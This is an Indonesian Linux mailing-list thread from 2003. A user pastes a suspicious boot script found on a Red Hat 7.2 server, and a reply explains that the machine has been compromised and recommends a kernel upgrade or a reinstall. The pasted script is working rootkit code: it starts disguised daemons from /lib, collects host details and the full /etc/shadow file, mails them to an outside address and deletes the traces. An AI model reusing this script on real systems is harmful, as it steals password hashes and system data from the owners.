Linux anda udah kebobolan tuch pak ...:-(
Sang hacker punya email di [EMAIL PROTECTED], coba hubungi aja dan ajak makan bersama :)
Untuk amannya, segera lakukan cek system secara total.
Matikan daemon yang gak perlu dan bermasalah, dan jangan lupa bahwa RedHat 7.2 dgn default installasi, masih vurnarable dgn PTRACE exploit, jadi kalo mempertahankan RH 7.2 nya, jangan lupa upgrade kernel anda.
Kalo gak mau pusing, install ulang ajah.
Saran saya, pake Trustix Secure Linux 2. Dia udah kernel 2.4, serta secara default dia sangat ketat. Sbg contoh, bila kita buat file baru, maka secara default permisionnya 600.
Juga, kalo jalanin BIND, dia secara default dubuatin chroot utk jalanin BIND.
CMIIW
Agung Ud
At 02:41 25/09/2003 +0700, you wrote:
Dear All,
Di RH 7.2 saya ada file yang Namanya /lib/setup dan berisi sbb;
PWD=`pwd` cd /lib export PATH=.:$PATH httpd >/dev/null cd /usr/lib identd & >/dev/null cd "$PWD"
/sbin/ifconfig | grep inet >/tmp/mailtone echo ############################## >> /tmp/mailtone uname -a >> /tmp/mailtone echo ############################## >> /tmp/mailtone hostname -i >> /tmp/mailtone echo ############################## >> /tmp/mailtone uptime >> /tmp/mailtone echo ############################## >> /tmp/mailtone ping -c 2 216.115.108.245 >> /tmp/mailtone system(" echo ############################## >>/tmp/mailtone cat /etc/shadow >>/tmp/mailtone echo ############################## >> /tmp/mailtone cat /etc/*release >>/tmp/mailtone echo ############################## >> /tmp/mailtone /usr/sbin/lsof -i -n -P >>/tmp/mailtone echo ############################## >> /tmp/mailtone cat /etc/sysconfig/nework-scripts/ifcfg* >> /tmp/mailtone echo ############END############### >> /tmp/mailtone cat /tmp/mailtone |mail -s power-6668 [EMAIL PROTECTED] rm -f /tmp/mailtone
Karena gak tau dan pas booting tampaknya File ini dipanggil beberapa kali oleh rc.local, sysinit, dll Untuk sementara saya rename aja jadi setup2 - akibat muncul err. Message file not found. Buat apa ya ada yang kepengen tau data2 seperti tersebut di atas? Ada yang bisa kasih info gak ini file apa?
-- regards,
Tajid Yakub, http://www.breakfree.web.id
-- Berhenti langganan: [EMAIL PROTECTED] Arsip dan info: http://linux.or.id/milis.php

